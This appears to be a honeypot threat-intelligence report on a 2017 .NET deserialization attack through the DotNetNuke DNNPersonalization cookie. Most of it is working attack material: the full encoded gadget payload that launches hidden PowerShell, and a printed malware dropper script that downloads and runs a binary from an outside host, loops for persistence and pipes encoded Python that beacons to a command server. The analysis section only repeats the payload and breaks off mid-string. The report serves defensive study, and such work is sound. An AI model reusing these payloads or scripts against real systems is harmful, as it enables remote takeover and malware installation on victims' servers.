Honeypot Extraction -Windows .NET Framework

Date of Detection:

2017.12.11

 

Source IP Addresses:

173.212.217.181、149.255.35.91

 

Attack Raw Pattern:

DNNPersonalization=<profile><item key=\"key\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type=\"ObjectStateFormatter\" xmlns:p3=\"http://www.w3.org/2001/XMLSchema-instance\" /> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:q1=\"http://www.w3.org/2001/XMLSchema\" p5:type=\"q1:string\" xmlns:p5=\"http://www.w3.org/2001/XMLSchema-instance\">/wEy8ykAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAoRgvYyBDOlxXaW5kb3dzXFN5c3RlbTMyXFdpbmRvd3NQb3dlclNoZWxsXHYxLjBccG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtZW5jb2RlIEpBQmxBRDBBSndCTEFFRUFRUUJ0QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVrQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUVBYVFCQkFFTUFNQUJCQUZvQVp3QkJBR2NBUVFCREFHTUFRUUJhQUZFQVFnQnFBRUVBU0FCUkFFRUFTZ0IzQUVFQWN3QkJBRU1BWXdCQkFGUUFad0JDQUd3QVFRQklBR01BUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdFQVp3QkJBRzRBUVFCREFIY0FRUUJLQUhjQVFRQjBBRUVBUlFBNEFFRUFXUUJuQUVFQWJnQkJBRU1BYXdCQkFFc0FVUUJCQUdjQVFRQkRBR2NBUVFCSkFHY0FRZ0EzQUVFQVJBQkZBRUVBWmdCUkFFSUFOd0JCQUVRQVNRQkJBR1lBVVFCQ0FEY0FRUUJFQUUwQVFRQm1BRkVBUWdBM0FFRUFSQUJSQUVFQVpnQlJBRUlBTndCQkFFUUFRUUJCQUdZQVVRQkJBR2tBUVFCREFEQUFRUUJhQUdjQVFRQm5BRUVBUXdCakFFRUFZZ0JuQUVJQU1BQkJBRU1BWXdCQkFFd0FRUUJCQUc0QVFRQkdBRTBBUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdRQVFRQkNBR3dBUVFCREFHTUFRUUJNQUVFQVFRQnVBRUVBU0FCckFFRUFZd0IzQUVFQWJnQkJBRU1BYXdCQkFFd0FRUUJCQUc4QVFRQkRBRWtBUVFCbEFIY0FRUUIzQUVFQVNBQXdBRUVBWlFCM0FFRUFlUUJCQUVnQU1BQkJBR1VBZHdCQkFIZ0FRUUJJQURBQVFRQkpBR2NBUVFCMEFFRUFSd0JaQUVFQVNnQjNBRUlBZEFCQkFFTUFZd0JCQUV3QVFRQkJBRzRBUVFCSEFGVUFRUUJaQUdjQVFnQkVBRUVBUndCM0FFRUFZUUJSQUVFQWJnQkJBRU1BZHdCQkFFb0Fkd0JCQUhVQVFRQkZBRFFBUVFCYUFGRUFRZ0F3QUVFQVF3QTBBRUVBVmdCM0FFRUFiZ0JCQUVNQWF3QkJBRXdBUVFCQkFHNEFRUUJIQUZVQVFRQktBSGNBUVFCd0FFRUFRd0JyQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjZBRUVBU0FBd0FFRUFaUUIzQUVFQWVRQkJBRWdBTUFCQkFHVUFkd0JCQUhjQVFRQklBREFBUVFCSkFHY0FRUUJuQUVFQVF3QXdBRUVBV2dCbkFFRUFad0JCQUVNQVp3QkJBRWtBWndCQ0FEY0FRUUJFQUVVQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUlBTndCQkFFUUFTUUJCQUdZQVVRQkJBR2tBUVFCREFFRUFRUUJNQUZFQVFnQnRBRUVBUXdCakFFRUFaQUJCQUVJQWVRQkJBRWNBYXdCQkFFb0Fkd0JCQUhNQVFRQkRBR01BUVFCWkFGRUFRZ0JyQUVFQVJnQk5BRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBR0lBWndCQ0FHNEFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVVnQkJBRUVBYmdCQkFFTUFkd0JCQUVzQVFRQkJBR2tBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBU0FCekFFRUFUUUJCQUVJQU9RQkJBRU1BU1FCQkFFa0FRUUJCQUhRQVFRQkhBRmtBUVFCS0FIY0FRZ0IxQUVFQVJ3QjNBRUVBWWdCM0FFRUFiZ0JCQUVNQWR3QkJBRW9BZHdCQ0FETUFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVlnQjNBRUVBYmdCQkFFTUFhd0JCQUV3QVp3QkJBR2tBUVFCSEFHc0FRUUJaQUVFQVFnQlBBRUVBUmdCWkFFRUFWQUIzQUVJQVp3QkJBRVVBY3dCQkFGb0FVUUJCQUdrQVFRQkRBR2NBUVFCTEFFRUFRUUJwQUVFQVNBQnpBRUVBVFFCQkFFSUFPUUJCQUVnQWN3QkJBRTRBUVFCQ0FEa0FRUUJJQUhNQVFRQk5BSGNBUWdBNUFFRUFTQUJ6QUVFQVRRQm5BRUlBT1FCQkFFZ0Fjd0JCQUU0QVVRQkNBRGtBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBUXdCSkFFRUFUQUJSQUVJQWJRQkJBRU1BUVFCQkFFc0FRUUJCQUdrQVFRQklBSE1BUVFCTkFFRUFRZ0E1QUVFQVNBQnpBRUVBVFFCUkFFSUFPUUJCQUVNQVNRQkJBRWtBUVFCQkFIUUFRUUJIQUZrQVFRQktBSGNBUWdCdkFFRUFTQUJSQUVFQVpBQkJBRUVBYmdCQkFFTUFkd0JCQUVvQWR3QkNBSGNBUVFCRUFHOEFRUUJLQUhjQVFRQndBRUVBUXdCM0FFRUFTZ0IzQUVJQWR3QkJBRWdBVFFCQkFFMEFVUUJCQUc0QVFRQkRBSGNBUVFCS0FIY0FRUUF6QUVFQVJ3QnZBRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBRm9BVVFCQ0FIUUFRUUJIQUZVQVFRQktBSGNBUVFCekFFRUFRd0JuQUVFQVNRQm5BRUlBTndCQkFFUUFRUUJCQUdZQVVRQkNBRGNBUVFCRUFFVUFRUUJtQUZFQVFRQnBBRUVBUXdBd0FFRUFXZ0JuQUVFQWJnQkJBRU1BT0FCQkFFd0Fkd0JDQURNQVFRQklBR01BUVFCa0FIY0FRUUIxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVjQVZRQkJBRW9BZHdCQkFIQUFRUUJEQUhjQVFRQkxBRUVBUVFCcEFFRUFTQUJ6QUVFQVRRQkJBRUlBT1FCQkFFZ0Fjd0JCQUUwQVVRQkNBRGtBUVFCREFFa0FRUUJNQUZFQVFnQnRBRUVBUXdCQkFFRUFTZ0IzQUVFQWRRQkJBRWdBWXdCQkFHRUFVUUJDQUhVQVFRQkRBRGdBUVFCakFIY0FRZ0JxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVnQVdRQkJBRXdBWndCQkFHNEFRUUJEQUdzQVFRQkxBRkVBUVFCd0FFRUFTQUIzQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjNBRUVBU0FBd0FFRUFTUUJuQUVFQWRBQkJBRWNBV1FCQkFFb0Fkd0JDQUd3QVFRQklBR2NBUVFCS0FIY0FRUUJ6QUVFQVF3QmpBRUVBWVFCUkFFRUFiZ0JCQUVNQWF3QkJBQ2NBT3dBZ0FITUFkQUJoQUhJQWRBQWdBRU1BT2dCY0FGY0FhUUJ1QUdRQWJ3QjNBSE1BWEFCVEFIa0Fjd0IwQUdVQWJRQXpBRElBWEFCWEFHa0FiZ0JrQUc4QWR3QnpBRkFBYndCM0FHVUFjZ0JUQUdnQVpRQnNBR3dBWEFCMkFERUFMZ0F3QUZ3QWNBQnZBSGNBWlFCeUFITUFhQUJsQUd3QWJBQXVBR1VBZUFCbEFDQUFMUUJYQUdrQWJnQmtBRzhBZHdCVEFIUUFlUUJzQUdVQUlBQklBR2tBWkFCa0FHVUFiZ0FnQUNjQUxRQmxBRzRBWXdCdkFHUUFaUUFuQUN3QUlBQWtBR1VBSUFBZ0FDQUEGBwAAABtDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==</anyType> </MethodParameters> </ProjectedProperty0> </ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>;

 

Target System:

Windows with .NET Framework

 

Malicious File Path from the Exploit:

For some variations of the attack, the exploits download malware, execute it, and then delete the file. This is one of the URLs that contain the malware: http://149.255.35.91/larva.sh.

The content of the sh file is as follows.

#!/bin/sh
psarg=""
if [[ -n `ps -lf` ]]; then
 psarg="-lf"
elif [[ -n `ps -au` ]]; then
 psarg="-au"
fi

mutex="21914"
mutex_exist=''
if [[ $psarg ]]; then
 if [[ `ps $psarg | grep -v grep | grep -c $mutex ` -gt 0 ]]; then
 mutex_exist=1
 else
 mutex_exist=''
 fi
fi

if [[ $mutex_exist -gt 0 ]]; then
 echo mutex exist, quiting script
 exit
else
 echo mutex not exist, starting a new one
 sleep 800.$mutex &
fi

sh -c "(cat < /dev/tcp/www.eeme7j.win/23546 > /tmp/mule || wget http://www.eeme7j.win/mule -O /tmp/mule || curl -s http://www.eeme7j.win/mule -o /tmp/mule) && chmod +x /tmp/mule && (nohup /tmp/mule &) && sleep 1 && rm -f /tmp/mule" &
rm -f /tmp/larva.sh

function tcp_download()
{
 FileServer=$1
 Port=$2
 Target=$3
 cat < /dev/tcp/$FileServer/$Port > $Target
}
function http_download()
{
 Url=$1
 Target=$2
 wget $Url -O $Target || curl -s $Url -o $Target
}
function download()
{
 FileServer=$1
 Port=$2
 FileName=$3
 Target=$4
 tcp_download $FileServer $Port $Target || http_download http://$FileServer/$FileName $Target
}
function download_and_execute()
{
 FileServer=$1
 Port=$2
 FileName=$3
 Target=$4
 download $FileServer $Port $FileName $Target
 chmod +x $Target
 nohup $Target &
 sleep 1
 rm -f $Target
}

echo "from subprocess import *;p = Popen('python',stdin=PIPE); p.stdin.write(\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly80Ni4yMS4xNDcuMTMzOjgwMDEnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPW84MkZ5MU11QWE5M0lMVnYwZS9PQ29qb2M2ST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKydlfU9CdStqRENOP152bVZnOzoxLSFMeG4jR2M8PXs5Syc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSk='));\");" | python

while true; do
 sleep 3600.$mutex &
 sleep 3600.$mutex
 download_and_execute www.eeme7j.win 23547 mule /tmp/mule
 pkill stratum
done

 

Analysis:

First, we decode the exploit by Base64.

The first-phased decoded message is as follows.

DNNPersonalization=<profile><item key="key" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type="ObjectStateFormatter" xmlns:p3="http://www.w3.org/2001/XMLSchema-instance" /> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:q1="http://www.w3.org/2001/XMLSchema" p5:type="q1:string" xmlns:p5="http://www.w3.org/2001/XMLSchema-instance">/wEy8ykAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAoRgvYyBDOlxXaW5kb3dzXFN5c3RlbTMyXFdpbmRvd3NQb3dlclNoZWxsXHYxLjBccG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtZW5jb2RlIEpBQmxBRDBBSndCTEFFRUFRUUJ0QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVrQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUVBYVFCQkFFTUFNQUJCQUZvQVp3QkJBR2NBUVFCREFHTUFRUUJhQUZFQVFnQnFBRUVBU0FCUkFFRUFTZ0IzQUVFQWN3QkJBRU1BWXdCQkFGUUFad0JDQUd3QVFRQklBR01BUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdFQVp3QkJBRzRBUVFCREFIY0FRUUJLQUhjQVFRQjBBRUVBUlFBNEFFRUFXUUJuQUVFQWJnQkJBRU1BYXdCQkFFc0FVUUJCQUdjQVFRQkRBR2NBUVFCSkFHY0FRZ0EzQUVFQVJBQkZBRUVBWmdCUkFFSUFOd0JCQUVRQVNRQkJBR1lBVVFCQ0FEY0FRUUJFQUUwQVFRQm1BRkVBUWdBM0FFRUFSQUJSQUVFQVpnQlJBRUlBTndCQkFFUUFRUUJCQUdZQVVRQkJBR2tBUVFCREFEQUFRUUJhQUdjQVFRQm5BRUVBUXdCakFFRUFZZ0JuQUVJQU1BQkJBRU1BWXdCQkFFd0FRUUJCQUc0QVFRQkdBRTBBUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdRQVFRQkNBR3dBUVFCREFHTUFRUUJNQUVFQVFRQnVBRUVBU0FCckFFRUFZd0IzQUVFQWJnQkJBRU1BYXdCQkFFd0FRUUJCQUc4QVFRQkRBRWtBUVFCbEFIY0FRUUIzQUVFQVNBQXdBRUVBWlFCM0FFRUFlUUJCQUVnQU1BQkJBR1VBZHdCQkFIZ0FRUUJJQURBQVFRQkpBR2NBUVFCMEFFRUFSd0JaQUVFQVNnQjNBRUlBZEFCQkFFTUFZd0JCQUV3QVFRQkJBRzRBUVFCSEFGVUFRUUJaQUdjQVFnQkVBRUVBUndCM0FFRUFZUUJSQUVFQWJnQkJBRU1BZHdCQkFFb0Fkd0JCQUhVQVFRQkZBRFFBUVFCYUFGRUFRZ0F3QUVFQVF3QTBBRUVBVmdCM0FFRUFiZ0JCQUVNQWF3QkJBRXdBUVFCQkFHNEFRUUJIQUZVQVFRQktBSGNBUVFCd0FFRUFRd0JyQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjZBRUVBU0FBd0FFRUFaUUIzQUVFQWVRQkJBRWdBTUFCQkFHVUFkd0JCQUhjQVFRQklBREFBUVFCSkFHY0FRUUJuQUVFQVF3QXdBRUVBV2dCbkFFRUFad0JCQUVNQVp3QkJBRWtBWndCQ0FEY0FRUUJFQUVVQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUlBTndCQkFFUUFTUUJCQUdZQVVRQkJBR2tBUVFCREFFRUFRUUJNQUZFQVFnQnRBRUVBUXdCakFFRUFaQUJCQUVJQWVRQkJBRWNBYXdCQkFFb0Fkd0JCQUhNQVFRQkRBR01BUVFCWkFGRUFRZ0JyQUVFQVJnQk5BRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBR0lBWndCQ0FHNEFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVVnQkJBRUVBYmdCQkFFTUFkd0JCQUVzQVFRQkJBR2tBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBU0FCekFFRUFUUUJCQUVJQU9RQkJBRU1BU1FCQkFFa0FRUUJCQUhRQVFRQkhBRmtBUVFCS0FIY0FRZ0IxQUVFQVJ3QjNBRUVBWWdCM0FFRUFiZ0JCQUVNQWR3QkJBRW9BZHdCQ0FETUFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVlnQjNBRUVBYmdCQkFFTUFhd0JCQUV3QVp3QkJBR2tBUVFCSEFHc0FRUUJaQUVFQVFnQlBBRUVBUmdCWkFFRUFWQUIzQUVJQVp3QkJBRVVBY3dCQkFGb0FVUUJCQUdrQVFRQkRBR2NBUVFCTEFFRUFRUUJwQUVFQVNBQnpBRUVBVFFCQkFFSUFPUUJCQUVnQWN3QkJBRTRBUVFCQ0FEa0FRUUJJQUhNQVFRQk5BSGNBUWdBNUFFRUFTQUJ6QUVFQVRRQm5BRUlBT1FCQkFFZ0Fjd0JCQUU0QVVRQkNBRGtBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBUXdCSkFFRUFUQUJSQUVJQWJRQkJBRU1BUVFCQkFFc0FRUUJCQUdrQVFRQklBSE1BUVFCTkFFRUFRZ0E1QUVFQVNBQnpBRUVBVFFCUkFFSUFPUUJCQUVNQVNRQkJBRWtBUVFCQkFIUUFRUUJIQUZrQVFRQktBSGNBUWdCdkFFRUFTQUJSQUVFQVpBQkJBRUVBYmdCQkFFTUFkd0JCQUVvQWR3QkNBSGNBUVFCRUFHOEFRUUJLQUhjQVFRQndBRUVBUXdCM0FFRUFTZ0IzQUVJQWR3QkJBRWdBVFFCQkFFMEFVUUJCQUc0QVFRQkRBSGNBUVFCS0FIY0FRUUF6QUVFQVJ3QnZBRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBRm9BVVFCQ0FIUUFRUUJIQUZVQVFRQktBSGNBUVFCekFFRUFRd0JuQUVFQVNRQm5BRUlBTndCQkFFUUFRUUJCQUdZQVVRQkNBRGNBUVFCRUFFVUFRUUJtQUZFQVFRQnBBRUVBUXdBd0FFRUFXZ0JuQUVFQWJnQkJBRU1BT0FCQkFFd0Fkd0JDQURNQVFRQklBR01BUVFCa0FIY0FRUUIxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVjQVZRQkJBRW9BZHdCQkFIQUFRUUJEQUhjQVFRQkxBRUVBUVFCcEFFRUFTQUJ6QUVFQVRRQkJBRUlBT1FCQkFFZ0Fjd0JCQUUwQVVRQkNBRGtBUVFCREFFa0FRUUJNQUZFQVFnQnRBRUVBUXdCQkFFRUFTZ0IzQUVFQWRRQkJBRWdBWXdCQkFHRUFVUUJDQUhVQVFRQkRBRGdBUVFCakFIY0FRZ0JxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVnQVdRQkJBRXdBWndCQkFHNEFRUUJEQUdzQVFRQkxBRkVBUVFCd0FFRUFTQUIzQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjNBRUVBU0FBd0FFRUFTUUJuQUVFQWRBQkJBRWNBV1FCQkFFb0Fkd0JDQUd3QVFRQklBR2NBUVFCS0FIY0FRUUJ6QUVFQVF3QmpBRUVBWVFCUkFFRUFiZ0JCQUVNQWF3QkJBQ2NBT3dBZ0FITUFkQUJoQUhJQWRBQWdBRU1BT2dCY0FGY0FhUUJ1QUdRQWJ3QjNBSE1BW